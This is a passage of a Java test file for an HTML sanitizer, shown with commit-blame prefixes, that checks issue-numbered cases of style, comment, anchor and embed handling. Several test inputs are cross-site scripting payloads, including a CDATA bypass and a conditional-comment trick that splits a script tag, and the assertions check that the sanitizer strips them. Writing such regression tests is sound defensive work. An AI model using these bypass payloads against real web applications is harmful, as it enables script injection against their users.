4210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      p = Pattern.compile(".*<b(\\s*)/>.*");
4220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
4230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s2).matches());
424afd4893acdc6af7f4e1e812dbd6ffcff58743d87manico.james@gmail.com
4250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      p = Pattern.compile(".*<i(\\s*)/>.*");
4260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
4270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s2).matches());
4280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      p = Pattern.compile(".*<hr(\\s*)/>.*");
4300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s1).matches());
4310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertFalse(p.matcher(s2).matches());
4320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #20 */
4350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />");
4360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("<b><i>Some Text</b></i>", "<i />");
4380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #25 */
4410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertEquals(
4420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<div>Test</div>", sanitize("<div style=\"margin: -5em\">Test</div>"));
4430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #28 */
4464e867904c8295537803c1c8a076e130df5674b58mikesamuel    assertSanitizedDoesContain(
4474e867904c8295537803c1c8a076e130df5674b58mikesamuel        "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">Test</div>",
448b268f8745b09a77af2e8c77ffd376b6459bf4fecmikesamuel        "font-family:&#39;geneva&#39; , &#39;arial&#39; , &#39;courier new&#39; , sans-serif");
4490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #29 - missing quotes around properties with spaces */
4510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
4520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<style type=\"text/css\"><![CDATA[P {\n     font-family: \"Arial Unicode MS\";\n}\n]]></style>";
4530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(s, sanitize(s));
4540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #30 */
4580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
4590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>";
4600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = sanitize(s);
4620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // followup - does the patch fix multiline CSS?
4640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s2 = "<style type=\"text/css\"><![CDATA[\r\nP {\r\n margin-bottom: 0.08in;\r\n}\r\n]]></style>";
4650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<style type=\"text/css\"><![CDATA[P {\n\tmargin-bottom: 0.08in;\n}\n]]></style>", sanitize(s2));
4660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // next followup - does non-CDATA parsing still work?
4680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s3 = "<style>P {\n\tmargin-bottom: 0.08in;\n}\n";
4700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<style>P {\n\tmargin-bottom: 0.08in;\n}\n</style>\n", sanitize(s3));
4710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // for other
4730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      // tests
4740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #32 - nekos problem */
4770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<SCRIPT =\">\" SRC=\"\"></SCRIPT>";
4790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sanitize(s);
4800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sanitize(s);
4810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #37 - OOM */
4840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String dirty = "<a onblur=\"try {parent.deselectBloggerImageGracefully();}" + "catch(e) {}\""
4860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "href=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\"><img" + "style=\"FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 150px; CURSOR:"
4870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "hand; HEIGHT: 100px\" alt=\"\"" + "src=\"http://www.charityadvantage.com/ChildrensmuseumEaston/images/BookswithBill.jpg\""
4880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "border=\"0\" /></a><br />Poor Bill, couldn't make it to the Museum's <span" + "class=\"blsp-spelling-corrected\" id=\"SPELLING_ERROR_0\">story time</span>"
4890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "today, he was so busy shoveling! Well, we sure missed you Bill! So since" + "ou were busy moving snow we read books about snow. We found a clue in one"
4900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "book which revealed a snowplow at the end of the story - we wish it had" + "driven to your driveway Bill. We also read a story which shared fourteen"
4910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      + "<em>Names For Snow. </em>We'll catch up with you next week....wonder which" + "hat Bill will wear?<br />Jane";
4920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = sanitize(dirty);
4940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertNotNull(s);
4950f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
4960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
4970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #38 - color problem/color combinations */
4980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
4990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<font color=\"#fff\">Test</font>";
5000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String expected = "<font color=\"#fff\">Test</font>";
5010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5044e867904c8295537803c1c8a076e130df5674b58mikesamuel      s = "<div style=\"color: #fff\">Test 3 letter code</div>";
505c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel      expected = "<div style=\"color:#fff\">Test 3 letter code</div>";
5064e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5074e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<font color=\"red\">Test</font>";
5100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      expected = "<font color=\"red\">Test</font>";
5110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5144e867904c8295537803c1c8a076e130df5674b58mikesamuel      s = "<font color=\"neonpink\">Test</font>";
5154e867904c8295537803c1c8a076e130df5674b58mikesamuel      expected = s;
5164e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5174e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (RUN_KNOWN_FAILURES) {
5200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        s = "<font color=\"#0000\">Test</font>";
5210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        expected = "<font>Test</font>";
5220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
5250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (RUN_KNOWN_FAILURES) {
5270f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        s = "<div style=\"color: #0000\">Test</div>";
5284e867904c8295537803c1c8a076e130df5674b58mikesamuel        expected = "<div>Test</div>";
5290f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5300f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertEquals(expected, sanitize(s));
5310f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
5320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<font color=\"#000000\">Test</font>";
5340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      expected = "<font color=\"#000000\">Test</font>";
5350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, sanitize(s));
5370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5384e867904c8295537803c1c8a076e130df5674b58mikesamuel      s = "<div style=\"color: #000000\">Test</div>";
539c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel      expected = "<div style=\"color:#000000\">Test</div>";
5404e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5414e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(expected, sanitize(s));
5420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<b><u>foo<style><script>alert(1)</script></style>@import 'x';</u>bar";
5440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sanitize(s);
5450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
5460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #40 - handling <style> media attributes right */
5480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
5500f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain("<style media=\"print, projection, screen\"> P { margin: 1em; }</style>", "print, projection, screen");
5510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
5520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #41 - comment handling */
5540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
5560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("text ", sanitize("text <!-- comment -->"));
5570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("text ", sanitize("text <!-- comment -->"));
5580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>"));
5610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!-- comment --></div>"));
5620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>"));
5640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!--[if IE]> comment <[endif]--></div>"));
5650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      /*
5670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * Check to see how nested conditional comments are handled. This is
5680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * not very clean but the main goal is to avoid any tags. Not sure
5690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * on encodings allowed in comments.
5700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       */
5710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>";
5720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String expected = "<div>text &lt;[endif]--&gt;</div>";
5730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String output = sanitize(input);
5740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, output);
5750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      input = "<div>text <!--[if IE]> <!--[if gte 6]> comment <[endif]--><[endif]--></div>";
5770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      expected = "<div>text &lt;[endif]--&gt;</div>";
5780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      output = sanitize(input);
5790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(expected, output);
5800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      /*
5820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * Regular comment nested inside conditional comment. Test makes
5830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * sure
5840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       */
5850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text  comment &lt;[endif]--&gt;</div>", sanitize("<div>text <!--[if IE]> <!-- IE specific --> comment <[endif]--></div>"));
5860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      /*
5880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       * These play with whitespace and have invalid comment syntax.
5890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel       */
5900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text </div>", sanitize("<div>text <!-- [ if lte 6 ]>\ncomment <[ endif\n]--></div>"));
5910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text  comment </div>", sanitize("<div>text <![if !IE]> comment <![endif]></div>"));
5920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("<div>text  comment </div>", sanitize("<div>text <![ if !IE]> comment <![endif]></div>"));
5930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String attack = "[if lte 8]<script>";
5950f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String spacer = "<![if IE]>";
5960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      StringBuffer sb = new StringBuffer();
5980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
5990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sb.append("<div>text<!");
6000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      for (int i = 0; i < attack.length(); i++) {
6020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sb.append(attack.charAt(i));
6030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        sb.append(spacer);
6040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
6050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      sb.append("<![endif]>");
6070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = sb.toString();
6090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "<script");
6110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "<script");
6120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /*
6150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * issue #44 - childless nodes of non-allowed elements won't cause an error
6160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     */
6170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<iframe src='http://foo.com/'></iframe>" + "<script src=''></script>" + "<link href='/foo.css'>";
6190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(s, "", sanitize(s));
6200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #51 - offsite urls with () are found to be invalid */
6230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain(
6240f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        "<a href='http://subdomain.domain/(S(ke0lpq54bw0fvp53a10e1a45))/MyPage.aspx'>test</a>", "(");
6250f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6260f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #56 - unnecessary spaces */
6274e867904c8295537803c1c8a076e130df5674b58mikesamuel    {
6280f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<SPAN style='font-weight: bold;'>Hello World!</SPAN>";
6294e867904c8295537803c1c8a076e130df5674b58mikesamuel      assertEquals(
630c517d7c6cadcd8643d565783464a2728be8c08d9mikesamuel          "<span style=\"font-weight:bold\">Hello World!</span>",
6314e867904c8295537803c1c8a076e130df5674b58mikesamuel          sanitize(s));
6320f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6330f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6340f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #58 - input not in list of allowed-to-be-empty tags */
6350f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6360f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "tgdan <input/> g  h";
6370f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals("tgdan  g  h", sanitize(s));
6380f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6390f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6400f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6410f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #61 - input has newline appended if ends with an accepted tag */
6420f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6430f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String dirtyInput = "blah <b>blah</b>.";
6440f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = sanitize(dirtyInput);
6450f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertEquals(dirtyInput, s);
6460f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6470f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6480f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* issue #69 - char attribute should allow single char or entity ref */
6490f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6504e867904c8295537803c1c8a076e130df5674b58mikesamuel    {
6510f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String s = "<td char='.'>test</td>";
6520f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6530f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6540f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6550f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='..'>test</td>";
6560f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6570f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6580f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6590f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='&quot;'>test</td>";
6600f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6610f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesContain(s, "char");
6620f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6630f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='&quot;a'>test</td>";
6640f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6650f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6660f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6670f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      s = "<td char='&quot;&amp;'>test</td>";
6680f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6690f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(s, "char");
6700f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6710f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6720f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* privately disclosed issue - cdata bypass */
6730f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6740f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String malInput = "<![CDATA[]><script>alert(1)</script>]]>";
6750f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6760f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(malInput, "<script");
6770f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6780f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6790f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    /* this test is for confirming literal-lists work as
6800f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * advertised. it turned out to be an invalid / non-
6810f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * reproducible bug report but the test seemed useful
6820f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     * enough to keep.
6830f3a7565157c70edb1935f04888fdc0407397fabmikesamuel     */
6840f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    {
6850f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String malInput = "hello<p align='invalid'>world</p>";
6860f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      assertSanitizedDoesNotContain(malInput, "invalid");
6870f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6880f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      String goodInput = "hello<p align='left'>world</p>";
6890f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      if (RUN_KNOWN_FAILURES) {
6900f3a7565157c70edb1935f04888fdc0407397fabmikesamuel        assertSanitizedDoesContain(goodInput, "left");
6910f3a7565157c70edb1935f04888fdc0407397fabmikesamuel      }
6920f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    }
6930f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
6940f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
6950f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  /*
6960f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * Tests cases dealing with nofollowAnchors directive. Assumes anchor tags
6970f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   * have an action set to "validate" (may be implicit) in the policy file.
6980f3a7565157c70edb1935f04888fdc0407397fabmikesamuel   */
6990f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testNofollowAnchors() throws Exception {
7000f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // adds when not present
7010f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7020f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7030f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // adds properly even with bad attr
7040f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" bad=\"true\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7050f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7060f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // rel with bad value gets corrected
7070f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" rel=\"blh\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7080f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7090f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // correct attribute doesnt get messed with
7100f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7110f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7120f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // if two correct attributes, only one remaining after scan
7130f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitized("<a href=\"blah\" rel=\"nofollow\" rel=\"nofollow\">link</a>", "<a href=\"blah\" rel=\"nofollow\">link</a>");
7140f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7150f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // test if value is off - does it add?
7160f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    assertSanitizedDoesNotContain("a href=\"blah\">link</a>", "nofollow");
7170f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  }
7180f3a7565157c70edb1935f04888fdc0407397fabmikesamuel
7190f3a7565157c70edb1935f04888fdc0407397fabmikesamuel  public void testValidateParamAsEmbed() throws Exception {
7200f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    // let's start with a YouTube embed
7210f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String input = "<object width=\"560\" height=\"340\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\"></param><param name=\"allowFullScreen\" value=\"true\"></param><param name=\"allowscriptaccess\" value=\"always\"></param><embed src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&\" type=\"application/x-shockwave-flash\" allowscriptaccess=\"always\" allowfullscreen=\"true\" width=\"560\" height=\"340\"></embed></object>";
7220f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    String expectedOutput = "<object height=\"340\" width=\"560\"><param name=\"movie\" value=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><embed allowfullscreen=\"true\" allowscriptaccess=\"always\" height=\"340\" src=\"http://www.youtube.com/v/IyAyd4WnvhU&hl=en&fs=1&;\" type=\"application/x-shockwave-flash\" width=\"560\" /></object>";
7230f3a7565157c70edb1935f04888fdc0407397fabmikesamuel    if (RUN_KNOWN_FAILURES) {
